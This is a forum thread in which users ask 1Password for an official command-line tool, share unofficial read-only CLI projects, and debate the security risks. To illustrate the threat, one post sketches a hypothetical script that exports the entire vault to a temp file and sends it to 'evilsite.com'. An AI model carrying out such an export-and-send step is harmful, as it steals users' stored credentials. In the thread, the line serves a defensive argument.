Command line utility

Warning No formatter is installed for the format ipb
«1

Comments

  • khad
    khad
    1Password Alumni
    Warning No formatter is installed for the format ipb
  • Warning No formatter is installed for the format ipb
  • Warning No formatter is installed for the format ipb
  • Warning No formatter is installed for the format ipb
  • khad
    khad
    1Password Alumni
    Warning No formatter is installed for the format ipb
  • oggy
    oggy
    Community Member

    I wrote my own command line reader here: https://github.com/oggy/1pass . Standard disclaimers apply.

  • oggy
    oggy
    Community Member

    I wrote a command line reader here: https://github.com/oggy/1pass . Doesn't support writing because I didn't want to screw up my keychain, but I'd take patches if someone out there is adventurous enough.

  • khad
    khad
    1Password Alumni

    Thanks for posting this, oggy! For those playing the home version of "Apps that Access 1Password Data Files", please be sure to read our recent blog post:

    You have secrets; we don’t. Why our data format is public

    The short version is that while we have to advise folks to never enter their 1Password Master Password into anything that isn’t 1Password, we have intentionally made our data format publicly available which means that such apps are inevitable. While we can’t endorse third-party apps, and indeed we have to advise against using them; their existence is still a Good Thing. They are proof that our openness about our data formats means that folks do not have to fear data lock-in. :)

  • general_axe
    general_axe
    Community Member

    Hi all,

    I'd like to add my vote to this request as well please (unless it's already been fulfilled?) ... I would find this functionality immensely useful, as I am in Terminal the whole time ... managing remote servers with complex (1Password generated) passwords.

    Cheers, Spencer

  • khad
    khad
    1Password Alumni

    Thanks, Spencer! I'll pass your vote along to the developers.

  • leesweet
    leesweet
    Community Member

    Do more votes help? Add me to the list..

  • khad
    khad
    1Password Alumni

    Thanks for letting us know you are interested as well! We really appreciate the feedback. Please keep it coming. :)

  • georgebrock
    georgebrock
    Community Member

    I've built an unofficial read-only command line interface for 1Password. It's a Python package, so you can install it by running pip install 1pass at the command line.

    There's more information here: https://pypi.python.org/pypi/1pass

    The source code is here: https://github.com/georgebrock/1pass

    This isn't officially sanctioned by AgileBits and like most free, open source software is provided without warranty, but it's working well for me and various friends and colleagues.

  • khad
    khad
    1Password Alumni

    Thank you for producing and posting this, @georgebrock. :)

    I feel it prudent to include our "standard disclaimer" here. From our "You have secrets; we don’t. Why our data format is public" blog post:

    Third party apps and 1Password data

    Let me jump to the what has prompted this article before returning to the virtues of publicly detailing our data format. Recently there’s been progress on third party tools and applications that can read 1Password data, and there are some important factors to consider about these tools:

    • Third party tools for reading 1Password data do not reflect a “break” in 1Password. They, like 1Password, require your Master Password in order to read your data.
    • We have to advise you to never enter your 1Password Master Password into anything that isn’t 1Password. We aren’t casting aspersions on the integrity or competence of any developers, but we simply can’t advise otherwise.
    • Third party tools are “third party”. Although we may sometimes help them understand the details of our data format, they are entirely independent of AgileBits. The fact that we may maintain a good relationship with them is not an endorsement of what they produce.
    • Third party tools exemplify the fact that there is no data lock in with 1Password.

    The existence of third party tools for reading 1Password data has had people ask about the security implications of us being so open about our data format. Our openness is a good thing, and here’s why.

  • anotheral
    anotheral
    Community Member

    Bump. This would be super-useful functionality for me, a *nix systems administrator. Something where I could embed a 1pass reply into a shell script would be amazing - a real-world example might be ipmitool, which takes a password on the command-line:

    ipmitool -U $(1p --print --user --account='foo-ipmi') -P $(1p --print --password --account='foo-ipmi') sol activate

    If I could do stuff like this, you'd be able to count me as a rabid evangelist for use of 1password in technical and even automated deployment settings.

  • adamehirsch
    adamehirsch
    Community Member
    edited August 2013

    I know this is probably a utility that would only be used by we neckbeards who like command line interfaces, but man, I would use an official Agile CLI interface many, many times a day. Consider this another vote. (Also, hi, Kevin!)

  • khad
    khad
    1Password Alumni

    I will definitely pass your votes along. Thanks for the additional feedback!

  • I'll add another (strong) request for a command line util.

  • khad
    khad
    1Password Alumni

    Thanks, @jstrater!

  • bradleymccrorey
    bradleymccrorey
    Community Member

    This is the only barrier to my registering 1password

  • khad
    khad
    1Password Alumni

    I'll make sure the developers know this. Thanks for your feedback, @bradleymccrorey! :)

  • owntheweb
    owntheweb
    Community Member

    Hello password masters,

    After setting up a new web server with a whole list of starting SSH access, FTP info, db info, etc., having some kind of terminal shortcuts would be awesome.

    1-up! :D

  • Thanks for getting in touch with us, @owntheweb :) It is a great suggestion that our developers have been looking at, it is just tricky to make sure we can do this in a secure manner.

    In 1Password 4 for Mac, we've made it easier to access your information from within 1PasswordMini, which will be in the main toolbar. It is not 100% what you are looking for, but it is a step in the right direction :)

  • evantill
    evantill
    Community Member

    1PasswordMini is great but is definitively not the solution

    what about action script

    A simple use case is using ssh to connect to a host (without certificate)
    1Password can act like opensssh and ask the first time with a modal dialog box to allow access to password XXX

  • Megan
    Megan
    1Password Alumni

    Hi @evantill,

    Thanks for the feedback! As mentioned, our developers are looking into solutions here, and I'll be sure to pass along your idea :)

  • Uno_Lavoz
    Uno_Lavoz
    Community Member
    edited October 2013

    Why aren't any of the commenters seeing the main issue with this?

    • You're asking that it be possible to access 1Password via the command line, without asking for the password (as long as 1Password is unlocked at the time).

    Am I really the only one that sees the issue here?

    Anyone?

    I'll give you a hint:

    Evilapp.sh: 1p --export '*' > /tmp/evil.txt; send evil.txt to evilsite.com

    The same power given to your scripts would be given to all evil programs on your computer.

    Consider this a -INFINITY negative vote from me to never add this feature.

    Stick to the various command line tools that others have written above.

    Unless it can be done securely somehow, it has no place in the official 1Password.

  • Megan
    Megan
    1Password Alumni

    Hi @Uno_Lavoz,

    Thanks for your feedback here - as Sara mentioned above, our developers are committed to finding a secure way to do this, if we do it at all. We certainly don't want any loopholes that might allow access for Evilapp :)

  • Uno_Lavoz
    Uno_Lavoz
    Community Member
    edited October 2013

    @Megan

    I don't think there is a secure way to do it. Doing it securely would mean having some sort of per-app-instance session-limited-permissions, but even that falls apart quickly:

    • You could find the process-ID (PID) of the calling process, such as an instance of Terminal.app running a script that uses it, or similar.
    • Then you check if that PID has been allowed during the current computing session. If not, pop up an Allow/Deny permission dialog (and a password prompt if 1P is locked at the moment).
    • If they allow the action, it adds that PID to a list of allowed processes for the current compute session.

    The problem then becomes that there's no way to distinguish Terminal.app with PID 12974 (allowed) from running good.sh or evil.sh. So after you've done your benign work, maybe some evil script will tag along and do its evil deeds by piggybacking off an allowed PID.

    The only way around that would be to just point-blank pop up an Allow/Deny dialog on EVERY call to 1P's command-line binary. This would quickly get out of hand if a script requires 4-5 calls. But it's the only truly safe way: Ask people to verify EVERY action (and always show the source app that requested permission, along with the command line parameters provided).

  • sjk
    sjk
    1Password Alumni

    Thanks for the additional followup, @Uno_Lavoz.

    We're aware of all these things which is a big part of the reason we haven't moved forward yet. But we never say never. Who knows what the future may bring? :)

  • georgebrock
    georgebrock
    Community Member

    Something I'm considering adding to 1pass is an option to have it run a command for you, substituting tokens like %u and %p for your login information. @anotheral gave this example:

    ipmitool -U $(1p --print --user --account='foo-ipmi') -P $(1p --print --password --account='foo-ipmi') sol activate
    

    I'm imagining an interface that looks more like this:

    1pass --execute "ipmitool -U %u -P %p sol activate" foo-ipmi
    

    1pass would prompt you for your master password, find the foo-ipmi login, fill in the username and password in the command, and run the complete command for you. It's secure, in so far as you have to type your master password each time you want to access data from your keychain, and it's convenient, because you don't have to invoke it multiple times to build a single command (which seems to be the reason people are requesting a CLI that doesn't require a password each time).

    I'm not looking for official sanction for 1pass here (@khad's caveat completely applies: 1pass isn't official, and you should definitely think carefully before typing your master password into anything that isn't the official app) , but I mention this because I wonder if this is the kind of interface that the 1Password team would consider sufficiently secure for an official CLI?

This discussion has been closed.